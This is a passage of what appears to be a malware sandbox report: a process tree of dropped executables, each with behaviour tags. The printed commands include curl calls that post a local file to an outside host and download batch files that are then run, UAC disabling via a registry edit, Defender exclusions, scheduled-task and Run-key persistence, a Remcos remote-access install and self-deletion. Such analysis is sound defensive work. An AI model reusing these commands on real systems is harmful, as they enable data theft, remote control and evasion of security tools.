                                                                                                                                          • C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                                            systeminfo
                                                                                                                                            5⤵
                                                                                                                                            • Gathers system information
                                                                                                                                            PID:4348
                                                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                            tasklist
                                                                                                                                            5⤵
                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:5208
                                                                                                                                        • C:\Windows\SysWOW64\curl.exe
                                                                                                                                          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:2364
                                                                                                                                        • C:\Windows\SysWOW64\curl.exe
                                                                                                                                          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:5772
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
                                                                                                                                          4⤵
                                                                                                                                          • Drops startup file
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:1436
                                                                                                                                        • C:\Windows\SysWOW64\curl.exe
                                                                                                                                          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:1872
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:6092
                                                                                                                                        • C:\Windows\SysWOW64\curl.exe
                                                                                                                                          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:4344
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:5096
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:5768
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\rascqn.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\rascqn.exe"
                                                                                                                                          4⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          PID:4280
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            5⤵
                                                                                                                                              PID:5848
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
                                                                                                                                          3⤵
                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          PID:3960
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp100.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp100.tmp.bat
                                                                                                                                            4⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:4440
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
                                                                                                                                          3⤵
                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          PID:5400
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\0RQI589Z58YU" & exit
                                                                                                                                            4⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:3416
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              timeout /t 10
                                                                                                                                              5⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:4976
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                          PID:4932
                                                                                                                                          • C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                            "C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:952
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
                                                                                                                                          3⤵
                                                                                                                                          • Adds policy Run key to start application
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Modifies registry class
                                                                                                                                          PID:2920
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                            4⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:5452
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              5⤵
                                                                                                                                                PID:3368
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                5⤵
                                                                                                                                                • UAC bypass
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Modifies registry key
                                                                                                                                                PID:6088
                                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
                                                                                                                                              4⤵
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:3464
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                5⤵
                                                                                                                                                  PID:2752
                                                                                                                                                  • C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                    C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                    6⤵
                                                                                                                                                    • Adds policy Run key to start application
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                    PID:5632
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                      7⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:756
                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        8⤵
                                                                                                                                                          PID:220
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                          8⤵
                                                                                                                                                          • UAC bypass
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          • Modifies registry key
                                                                                                                                                          PID:5952
                                                                                                                                                      • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                                                                                                                                        "c:\program files (x86)\internet explorer\iexplore.exe"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:4540
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  PID:3372
                                                                                                                                                  • C:\Windows\System32\certutil.exe
                                                                                                                                                    "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp1D83.tmp"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:6092
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:460
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:5016
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5872
                                                                                                                                                    • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                      attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                      PID:1216
                                                                                                                                                    • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                      attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                      PID:3628
                                                                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                      schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
                                                                                                                                                      4⤵
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:5552
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell ping 127.0.0.1; del gU8ND0g.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                      PID:4904
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        "C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                                        5⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:3464
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                    PID:3588
                                                                                                                                                    • C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                      "C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:3024
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\888.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\888.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:4532
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                                                                                                                                                      4⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:4444
                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        5⤵
                                                                                                                                                          PID:732
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 1236
                                                                                                                                                        4⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                        PID:1580
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\50to.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:4804
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\info.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\info.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:5464
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
                                                                                                                                                        4⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:5492
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5172
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
                                                                                                                                                            5⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5512
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
                                                                                                                                                          4⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:5612
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            5⤵
                                                                                                                                                              PID:2988
                                                                                                                                                            • C:\Windows\SysWOW64\regedit.exe
                                                                                                                                                              regedit /s "C:\Windows\SysWOW64\ruts\11.reg
                                                                                                                                                              5⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                              • Runs .reg file with regedit
                                                                                                                                                              PID:2812
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
                                                                                                                                                            4⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5668
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              5⤵
                                                                                                                                                                PID:6004
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
                                                                                                                                                                5⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:5328
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
                                                                                                                                                              4⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:4536
                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                5⤵
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:3920
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
                                                                                                                                                                5⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:2600
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c delete.bat
                                                                                                                                                              4⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:2220
                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                5⤵
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:3612
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\50.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\50.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:4592
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\SH.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:2584
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5732
                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 5732 -s 1512
                                                                                                                                                              4⤵
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                              PID:4408
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:1300
                                                                                                                                                            • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                              "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                              PID:3960
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:2572
                                                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                                                              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
                                                                                                                                                              4⤵
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2360
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\XW.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:728
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
                                                                                                                                                              4⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:800
                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:2944
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
                                                                                                                                                                4⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:4608
                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:5668
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                  PID:4628
                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:1108
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:3464
                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:5836
                                                                                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                                                                                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                      PID:5976
                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:2516
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      PID:5340
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 1308
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Program crash
                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                        PID:7600
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5744
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                        PID:5608
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 884
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                          • Program crash
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          PID:2052
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
                                                                                                                                                                        3⤵
